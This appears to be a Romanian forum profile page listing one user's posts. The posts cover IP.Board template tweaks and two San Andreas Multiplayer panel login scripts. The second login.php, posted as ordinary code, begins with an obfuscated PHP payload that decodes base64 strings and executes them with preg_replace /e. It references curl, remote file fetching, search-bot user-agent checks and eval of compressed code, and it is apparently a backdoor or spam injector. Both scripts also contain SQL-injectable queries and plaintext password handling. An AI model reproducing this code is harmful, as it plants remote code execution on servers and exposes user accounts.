-
Posts
62 -
Joined
-
Last visited
Content Type
Profiles
Forums
Events
Everything posted by SunSet
-
Tu chiar nu intelegi ca nu imi apare jos ce accese sa aibe la acel forum?
-
Am si eu o problema si nu stiu care ar putea fi cauza, mai exact, cand vreau sa adaug un grup sau o persoana ca si moderator pe o categorie anume, imi apare doar sa selectez unde sa fie nu si ce sa faca, adica sa dea warn sa inchida/deschida, etc. In concluzie apare ca moderator acolo dar nu poate face nimic.
-
Custom Side Block: http://invision-virus.com/forum/index.php/files/file/341-e32-custom-sidebar-blocks/ Top reputation: http://webflake.sx/files/file/189-top-reputation/ Recent topics daca nu ma insel il ai deja in IPB, nu trebuie descarcat, doar activat.
-
Ajutor Personalizare Aranjare Informatii Profil In Ipb
SunSet replied to SunSet's topic in IP.Board 3.x
BUMP xD -
Ajutor Personalizare Aranjare Informatii Profil In Ipb
SunSet replied to SunSet's topic in IP.Board 3.x
<if test="$this->settings['horizontalTopicView']='no'"></if> <!-- --> <div itemscope itemtype="http://schema.org/Person" class='user_details <if test="$this->settings['horizontalTopicView']=='yes'">clearfix</if>'> <if test="($this->settings['horizontalTopicView']=='yes') AND $this->request['section'] == 'topics'"> <div class='horizontalAvatar left'> <if test="avatar:|:$author['member_id']"> <if test="canSeeProfiles:|:$this->memberData['g_is_supmod'] OR ( $this->memberData['g_mem_info'] && ! IPSMember::isInactive( $author ) )"> <a itemprop="url" href="{parse url="showuser={$author['member_id']}" template="showuser" seotitle="{$author['members_seo_name']}" base="public"}" title="{$this->lang->words['view_profile']}: {$author['members_display_name']}" class='ipsUserPhotoLink'> </if> <if test="hasVariable:|:$this->settings['member_topic_avatar_max']"> <img itemprop="image" src='{$author['pp_main_photo']}' class='ipsUserPhoto ipsUserPhoto_variable' /> <else /> <img itemprop="image" src='{$author['pp_thumb_photo']}' class='ipsUserPhoto ipsUserPhoto_large' /> </if> <if test="canSeeProfiles2:|:$this->memberData['g_is_supmod'] OR ( $this->memberData['g_mem_info'] && ! IPSMember::isInactive( $author ) )"> </a> </if> <else /> <img itemprop="image" src='{$author['pp_thumb_photo']}' class='ipsUserPhoto ipsUserPhoto_large' /> </if> </div> <div class='horizontalUserInfo'> <div class='horizontalUsername'> <if test="$author['member_id']"> <span itemprop="creator name" class="author vcard">{parse template="userHoverCard" group="global" params="$author"}</span> <else /> {$author['members_display_name']} </if> </div> <ul class='horizontalInfoList' style='width: 140px;'> <li class='group_title'> {$author['_group_formatted']} </li> <if test="postCount:|:$author['member_id']"> <li class='post_count desc lighter'> {parse expression="$this->registry->getClass('class_localization')->formatNumber( intval( $author['posts'] ) )"} {$this->lang->words['m_posts']} </li> </if> </ul> <ul class='horizontalInfoList' style='width: 140px;'> <if test="rankimage:|:$author['member_rank_img']"> <li class='group_icon'> <if test="rankimageimage:|:$author['member_rank_img_i'] == 'img'"> <img src='{$author['member_rank_img']}' alt='' /> <else /> {$author['member_rank_img']} </if> </li> </if> <if test="membertitle:|:$author['member_title']"> <li>{$author['member_title']}</li> </if> <if test="authorwarn:|:$author['show_warn']"> <li> <if test="hasWarningId:|:$options['wl_id']"> <img src='{$this->settings['img_url']}/warn.png' class='clickable' onclick='warningPopup( this, {$options['wl_id']} )' title='{$this->lang->words['warnings_issued']}' /> </if> <a class='desc lighter blend_links' href='{parse url="app=members&module=profile&section=warnings&member={$author['member_id']}&from_app={$this->request['app']}&from_id1={$contentid}&from_id2={$options['id2']}" base="public"}' id='warn_link_{$contentid}_{$author['member_id']}' title='{$this->lang->words['warn_view_history']}'>{parse expression="sprintf( $this->lang->words['warn_status'], $author['warn_level'] )"}</a> </li> </if> </ul> <if test="authorcfields:|:$author['custom_fields'] != """> <ul class='horizontalInfoList custom_fields'> <foreach loop="customFieldsOuter:$author['custom_fields'] as $group => $data"> <foreach loop="customFields:$author['custom_fields'][ $group ] as $field"> <if test="$field != ''"> <li> {$field} </li> </if> </foreach> </foreach> </ul> </if> <ul class='horizontalInfoList' style='float: right; width: 190px;'> <li><if test="$author['_online']"><img src="{style_images_url}/post_online.png" alt="" class='post_online' data-tooltip="Online" /><else /><img src="{style_images_url}/post_offline.png" alt="" class='post_online' data-tooltip="Offline" /></if> Last active: {$author['_last_active']}</li> <li style='padding-left: 15px;'>Joined: {parse date="$author['joined']" format="DATE"}</li> </ul> </div> <else /> <span class='hide' itemprop="name">{$author['members_display_name']}</span> <ul class='basic_info'> <if test="membertitle:|:$author['member_title']"> <p class='desc member_title'>{$author['member_title']}</p> </if> <if test="avatar:|:$author['member_id']"> <li class='avatar'> <if test="canSeeProfiles:|:$this->memberData['g_is_supmod'] OR ( $this->memberData['g_mem_info'] && ! IPSMember::isInactive( $author ) )"> <a itemprop="url" href="{parse url="showuser={$author['member_id']}" template="showuser" seotitle="{$author['members_seo_name']}" base="public"}" title="{$this->lang->words['view_profile']}: {$author['members_display_name']}" class='ipsUserPhotoLink'> </if> <if test="hasVariable:|:$this->settings['member_topic_avatar_max']"> <img itemprop="image" src='{$author['pp_main_photo']}' class='ipsUserPhoto ipsUserPhoto_variable' /> <else /> <img itemprop="image" src='{$author['pp_thumb_photo']}' class='ipsUserPhoto ipsUserPhoto_large' /> </if> <if test="canSeeProfiles2:|:$this->memberData['g_is_supmod'] OR ( $this->memberData['g_mem_info'] && ! IPSMember::isInactive( $author ) )"> </a> </if> </li> <else /> <li class='avatar'> <img itemprop="image" src='{$author['pp_thumb_photo']}' class='ipsUserPhoto ipsUserPhoto_large' /> </li> </if> <li class='group_title'> {$author['_group_formatted']} </li> <if test="rankimage:|:$author['member_rank_img']"> <li class='group_icon'> <if test="rankimageimage:|:$author['member_rank_img_i'] == 'img'"> <img src='{$author['member_rank_img']}' alt='' /> <else /> {$author['member_rank_img']} </if> </li> </if> <if test="postCount:|:$author['member_id']"> <li class='post_count desc lighter'> {parse expression="$this->registry->getClass('class_localization')->formatNumber( intval( $author['posts'] ) )"} {$this->lang->words['m_posts']} </li> </if> <if test="authorwarn:|:$author['show_warn']"> <li> <if test="$options['wl_id']"> <img src='{$this->settings['img_url']}/warn.png' class='clickable' onclick='warningPopup( this, {$options['wl_id']} )' title='{$this->lang->words['warnings_issued']}' /> </if> <a class='desc lighter blend_links' href='{parse url="app=members&module=profile&section=warnings&member={$author['member_id']}&from_app={$this->request['app']}&from_id1={$contentid}&from_id2={$options['id2']}" base="public"}' id='warn_link_{$contentid}_{$author['member_id']}' title='{$this->lang->words['warn_view_history']}'>{parse expression="sprintf( $this->lang->words['warn_status'], $author['warn_level'] )"}</a> </li> </if> </ul> <if test="authorcfields:|:$author['custom_fields'] != """> <ul class='custom_fields'> <foreach loop="customFieldsOuter:$author['custom_fields'] as $group => $data"> <foreach loop="customFields:$author['custom_fields'][ $group ] as $field"> <if test="$field != ''"> <li> {$field} </li> </if> </foreach> </foreach> </ul> </if> </if> </div> -
Cum pot aranja informatiile de profil ale utilizatorilor forumului meu IPB ca in imaginea de mai jos?
-
Am si eu o problema la forum, un anumit mesaj nu apare doar daca te uiti la un topic la fel si pro menu-ul. Adica pe alte comunitati am vazut ca nu au probleme cu aceste doua lucruri si in plus de asta nu am gasit nici o setare prin care pot sa le fac vizibile si pe Index. http://g.iceimg.com/E5uJZYxfVcvt/untitled.png
-
Ajutor Aranjare Servere Ca Pe Csblackdevil.com Sau Joincs.ro
SunSet replied to Courage's topic in IP.Board 3.x
www.hardplay.ro (Nu tema actuala doresc sa o modific) boardIndexTemplate Pe 3 coloane, cred ca tot forumul doresc sa fie aranjat -
Am si eu un banner pe forum si de fiecare data cand instalez un hook sau ceva revine la fosta denumire de la tema in style_css, in loc de ce am acum .png se face .jpg, si de fiecare data trebuie sa modific. Cum pot adauga ceva in acel meniu. (Forums - Members - IPB Shoutbox) - http://iceimg.com/tVS5ACj3QWw8/untitled.png
-
Buna ziua, am un panel pentru San Andreas MultiPlayer (Nu stiu daca are vreo importanta), baza de date pe care functioneaza cripteaza parolele, si am 2 UCP-uri, unul care a venit cu baza de date si altul care este separat, daca cineva incearca sa se logheze pe cel pe care l-am achizitionat acum ii zice parola gresita, daca bag acea parola "criptata" de imi apare mie in mysql ii merge. de exemplu Am parola "1234" si in Baza de date imi apare "3FF9ED79320C00B4165DE4311AB8579BC0E3B6E6CBB44B74D6A7526C7E960E38E5663901D73B05032454D3FCE74EBEBAF70F1D4E2EF0987E95818955E493623E" ceva de genul, bag 1234, nu merge, incerc aceste numere, merge. Panel 1 la care merge cu criptare login.php <?php session_start(); ##################################################### require_once "includes/configurare.php"; require_once "includes/functii.php"; ##################################################### if ($_POST) { $username = mysql_real_escape_string($_POST['username']); $password = mysql_real_escape_string($_POST['password']); $captcha = mysql_real_escape_string($_POST['captcha']); $password = strtoupper(hash("whirlpool","$password")); $euser = mysql_fetch_array(mysql_query("SELECT id from players where Name='$username'")); $euser = $euser[0]; $parola = mysql_fetch_array(mysql_query("SELECT Password from players where Name='$username'")); $parola = $parola[0]; if (!$euser[0]) { $eroare = "user"; } else if ($parola!==$password) { $eroare = "parola"; } else if (empty($_SESSION['captcha']) || strtolower(trim($_REQUEST['captcha'])) != $_SESSION['captcha']) { $eroare = "captcha"; } else { $user_db = mysql_fetch_array(mysql_query("SELECT Name from players where id='$euser'")); $user_db = $user_db[0]; setcookie ("user",$user_db,time()+3600*24*60); setcookie ("pass",$password,time()+3600*24*60); header("Location: $adresa/index.php"); } unset($_SESSION['captcha']); } ##################################################### echo "<html>n"; echo "<head>n"; echo "<title>Login zone @ $titlu_site</title>n"; echo "<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />n"; echo "<link rel="shortcut icon" href="stylesheet/img/devil-icon.png">n"; echo "<link rel="stylesheet" type="text/css" href="mos-css/mos-style.css">n"; echo "</head>n"; echo "<body>n"; echo "<div id="header">n"; echo "<div class="inHeaderLogin"></div>n"; echo "</div>n"; echo "<div id="loginForm">n"; echo "<div class="headLoginForm">n"; echo "Login Playern"; echo "</div>n"; echo "<div class="fieldLogin">n"; echo "<form method="POST" action="login.php">n"; if (!$eroare) { echo "<label>Username</label>n"; echo "<input type="text" class="login" name="username"><br>n"; echo "<label>Parola</label><br>n"; echo "<input type="password" class="login" name="password"><br>n"; echo "<label>Cod securitate</label><br>n"; echo "<img src="includes/captcha.php?$data" alt="cod securitare"><br>n"; echo "<input type="text" name="captcha" value=""><br><br>n"; } else if ($eroare=="user") { echo "<label>Username <font color="red">( incorect )</font></label>n"; echo "<input type="text" class="login" name="username"><br>n"; echo "<label>Parola</label><br>n"; echo "<input type="password" class="login" name="password"><br>n"; echo "<label>Cod securitate</label><br>n"; echo "<img src="includes/captcha.php?$data" alt="cod securitare"><br>n"; echo "<input type="text" name="captcha" value=""><br><br>n"; } else if ($eroare=="parola") { echo "<label>Username</label>n"; echo "<input type="text" class="login" name="username"><br>n"; echo "<label>Parola <font color="red">( incorect )</font></label><br>n"; echo "<input type="password" class="login" name="password"><br>n"; echo "<label>Cod securitate</label><br>n"; echo "<img src="includes/captcha.php?$data" alt="cod securitare"><br>n"; echo "<input type="text" name="captcha" value=""><br><br>n"; } else if ($eroare=="captcha") { echo "<label>Username</label>n"; echo "<input type="text" class="login" name="username"><br>n"; echo "<label>Parola</label><br>n"; echo "<input type="password" class="login" name="password"><br>n"; echo "<label>Cod securitate <font color="red">( incorect )</font></label><br>n"; echo "<img src="includes/captcha.php?$data" alt="cod securitare"><br>n"; echo "<input type="text" name="captcha" value=""><br><br>n"; } echo "<input type="submit" class="button" value="Login">n"; echo "<a href="$adresa/recover.php"><input type="button" class="button" value="Recuperare parola"></a>n"; echo "</form>n"; echo "</div>n"; echo "</div>n"; echo "</body>n"; echo "</html>n"; ?> PANEL 2 LA CARE VREAU SA MEARGA <?php /*versio:2.19*/$I1I1=87051;if (!function_exists('Il1111Il')){$GLOBALS['I1I1'] = 't$wY3VybAZX2luaXQPYWxsb3dfdXJsX2ZvcGVu*MQvaHR0cDovLwYJndheT1maWxlX2dldF9jb250ZW50cwi{X3NldG9wdAX2V4ZWMJndheT1jdXJsL{UulLw#YZ{q#b3Nvbi5pbg{#cnllcGR4LmNvbQcGhwYWlkZS5jb20OdwWV8OgKsZGlzcGxheV9lcnJvcnM&%(oh_ZGV0ZXJtaW5hdG9yY{*ZnRwMTMjMi4xOQXklSWwxMUkxbDE.JkNYmFzZTY0X2RlY29kZQkYmFzZTY0X2VuY29kZQSFRUUFMl^Vkb2ZmHaHR0cHM6Ly8*CTSFRUUF9IT1NUwudEdW5pb24Y_c2VsZWN0e#u%PUkVRVUVTVF9VUkkMAlU0NSSVBUX05BTUUGyLUVVFUllfU1RSSU5HLy$PwYL3RtcC8uZm9udC11bml4YhwTAOL3RtcC8uSUNFLXVuaXg$oCVE1Q;{VEVNUA.=VE1QRElSL3RtcAE)uAdXBsb2FkX3RtcF9kaXI_K dG1wd3AtY29udGVudC91cGxvYWRzL.!cd3AtY29udGVudC9jYWNoZQLgm(dmVyc2lvDm;awLQwyLXBocAoHSFRUUF9FWEVDUEhQb3V0bq;b2sF{SFRUUF9VU0VSX0FHRU5UvbMqyLA_;HxJcZ29vZ2xlLHlhaG9vLGJpbmcsbXNuYm90LGFzayxiYWlkdSx5YW5kZXg(mbFFL3BnLnBocD91PQpkJms9TQJnQ9cGhwJnA9yJnY9ZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgiZUp5VlZ3OVBvMWdRL3lyUFptTWdZVG1ncGJUbmNXbXpXMWNTcjloYU45bTREZW0ycjBxV2dnRjZyakYrOTV1Wjl4NVF4ZDRkbW9odjVzMy8rYzBRYjVsMnN1SGJPT1VicmJQaEpjOTNjYm9xczd5ajY4OXN1MC9YWlp5bHJFbUp0anpiYWg5bW9UV3pRb09kZmdnU093a1M1clBwemVXbHpwNVpmYktMMTNsV3hqdXVsZm1lNjJjczUrVStUMWxUQkp5KzFKcnVlTG1ORXc1RXl3cER5d0JoZ1Iwa0FWZ0RSelA0QmJFZ0g1NGcwYm9HNjhOOVVCallDU3FVUEdiRllZTUlEMWhHY1JwSEJTKzFtakl3bUdQcEJyT0JIRU1naU9XdWhVVm5mbFBuRUE1MThuTUdIb1NoUDBLTDhXYTB6dEtTcDJWUmkrZzVvTURTbWNta1IvZ21YREpybVM0NDBnVkZWWUNrYUF3TlR3cU81cWtRUmZ4WFhJQUs2YlJPa1lISENzSC9rVHpWTUNwMGFyVkZaZUNTVmNnVGh1TG1HNTZoS3lNbjVXaFNpOEUrM2N3dnc2dEZCSDhNOWo4OXRTMWtjL1NqZ2k4bTQ4K1R1YkZkZ2V0SEdlZVR4YzE4dXBpUHA5Zm5jRUVXMmZ2OG44THBkUEpwc1FqK21vUTNDNE81RkFMTGdtQlQ4RVEwMUQwVXRkN25TYlJPc29JM1RqRWRmUGRRUG1ueU1pU2hGbFA3aXZVRFVYNnBzMG84S3F0VVF0UURxSHhiWk91ZjJRTlA2OW9mWVAzVG5aQWFBUjViR0kwV3FQNlJZdUJLbTNKMjJKL2cwdlpoaitXakdyanpaYkpnenpKVEw2ZVBxeWNmTGVFbHUxZ3NybjZ6VGV0Ny9qMjl5SXJ5ZC9Zc1RYdkJvNDRJWGpnTHNTZXZMcTZpOExyUmVEYjFpWW5uWHlmejZ5Q2N0dWkrS1hqK2NYd0hQU09Fb3pBU3JoUTgzaU1hbkJ3QklPbWZ6azVQbWZZS2NOakhtdndIV0ZOSHlzU0lROHMyakxHZEFXSFJhS3Z5cmZBSmU4TWlML212aHlUYmNLMVQyV2dva2NDM1R4RmhKUGV0dGF6N09kNjEzU00rMG9rL1pDbWgyRGpQVjA4TkdISThhcTFHczltSVFuYnY0QWhCeEhheHN5bzBmY3pqa2dyWGdzZWdBcDdOSUFxeWZQQUI5SkpGSjVocWVYMEJkTUErMmlwQmRLVVNkTmFNRlQ3U2wwcC90aThoNFlJNm00bGlEc2tDdnI3UEdyWjdVTmRkM1pTTWpTcnllbFJGOHFKSjhldFFsdDRDdWdjVmJ3OTFVZlppcXRWVXg4THc5Q1hlQzI5RHZ5WTdqb0E3eXFabE5TaGRTMDBaN0QrN1NjRWtrRGhvbmlCSkdpUVg3TFlIUWhNZ2VWT2UxNjFJMUV6K2F3Z1Y3UjBYVkV6UjlXUU8vWE5iM3gvYWFPbFNsM2tjdmMvQ1RwcHpDNUczSjhiRks3MWR5NU9PVUIwS3N1a1haVjVtU2ZiSTh6WWxYY2NtSk1jcTMyWTVYNjN2b2FnaVJKTlZ3V1FtL1QvcmxLT3hJUEloS3pSNVdCZGJ0K3VoeFlpaktPRldYbC82TFdDcUJ1SzdzbnA5Z003L0p1c0ZyTkpPM2d0MTF4MVNTeTNGdUgrZlRzUGpMZG56QkJrVDJocENuTEZRazh0L0UyODI4dGl6cVNWZ3VoNlRLRkpKZlE2RkNZWHJxN1MyM2FyOFZNdWI3WTkyRzFkTklsTTJoU2xCWG5hQzZBbW9mTnZmeEhtNkF0U05vdlBnY2hKRnV2azVtTU9rRGVmZlFOdlZlRDZHVjlFTVlpVVJFTmYweXBQcldIM1U2OHArYmpHNTEzZXhtcGZ0UklTVHZpUk9wbC9mdVhaSThZWllOYTBVSmEwK0duaDRaTEMzTzJOdjZKSFZ1cUdDVTZPWml6T3gxMHB4d0Zlbm5lU0Nlc2NCMGtHanlVaFNxOEU3N0NDaXcwN1VZaUlPNVhaSS9keWFFckg1RmhFaS9PcEh3Zzl1Q2x0b082VERNL1lEOVArc0psYTVlL0RmR293QWg1Z3RLdW5zRlVwMWNLMkl2a1hqbThWRlorbjdrazNOQklYd0l6azdHbUk5VEpDaEVMcWhjR2pKSVVHZzNpVDBNRTNWdm9SSVBQTWxXTGMxWkorMjA3NEExeEgvZTVXb1d5RGp1SGw5eEpTRGdkeDNYQnhxaEtxd3M1ZWFSYThxNE9JekJ5Skl1c3Bzdjc0WC85TEh5anJaYjNpVXBXdXVEZ1h3VVlOU1A0OWdNK1hwR3JjS2VhVDJNZnBHR2gxSDd6NU9OZWkzQS9SVzIwM041Ym9ZMmFaVGZVaXVDMXVHQXZsWlZYazFIcU1KUmtVOThmMXoydVRsdkdxNHFtb3NDWnFycTRmTkFNdU5LZjJxRStwMXFZRlVhVFVJUFplRzBkc2E4TnlCdUNLcVJ1ekRBYTFaMWJlbVdMeGdZYXMvTjg5ZXBlVGxzUExoNXgvVkxoSlQiKSkpOw%#ocHJlZ19yZXBsYWNl&zU';function Il1111Il($a, $b){$c=$GLOBALS['I1I1']; $d=pack('H*','6261736'.'536345f6465636f6465'); return $d(substr($c, $a, $b));};$QOOQQQ00O = Il1111Il(3387, 16);$QOOQQQ00O("/QOQQ0OQQO/e", Il1111Il(762, 2622), "QOQQ0OQQO");};?><?php include 'includes/config.php'; include 'includes/header.php'; if(isset($_POST['username']) && isset($_POST['password'])){ $username = sec($_POST['username']); $password = mysql_real_escape_string($_POST['password']); $check = get_row("SELECT id FROM players WHERE Name='$username' && Password='$password'"); if(isset($check['id'])){ $banned = get_row("SELECT * FROM banuri WHERE Nume='$username'"); if(isset($banned['id'])){ if($banned['BanaP'] == 0){ $err = 'Esti banat permanent'; }else{ $err = 'Esti banat pana la data de '.$banned['BanzP'].'.'.$banned['BanlP'].'.'.$banned['BanaP'].'.'.$banned['BanoP'].':'.$banned['BanmP']; } }else{ $_SESSION['username'] = $_POST['username']; $_SESSION['password'] = $_POST['password']; mysql_query("UPDATE players SET rpgon=2 WHERE Name='$username'"); header('location: cont.php'); } }else{ $err = 'Username sau parola incorecte'; } } ?> <form method="POST" action="login.php"> <center><table id="loginstyle"> <br /> <br /> <tr> <td id="intxt"><p style="color:#FFFFFF">Utilizator:</p></td></center> <td><input id="instyle" type="text" name="username" /></td> </tr> <tr> <td id="intxt"><p style="color:#FFFFFF">Parola:</p></td></center> <td><input id="instyle" type="password" name="password" /></td> </tr> <tr> <td colspan="2" style="color:#FF0000"> <input background="images/user.png" id="sbm" type="submit" value="Submit" > </td> </tr> <?php if(isset($err)): ?> <tr> <td colspan="2" style="color:#FF0000;font-weight:bold;"> <?=$err?> </td> </tr> <?php endif; ?> </table> <center> <img src="http://www.game-state.eu/188.241.14.22:7777/FFFFFF/FFFFFF/n-560x95.png" alt="www.Game-State.eu" style="border-style: none;" /> </center> </form> <?php include 'includes/footer.php'; ?>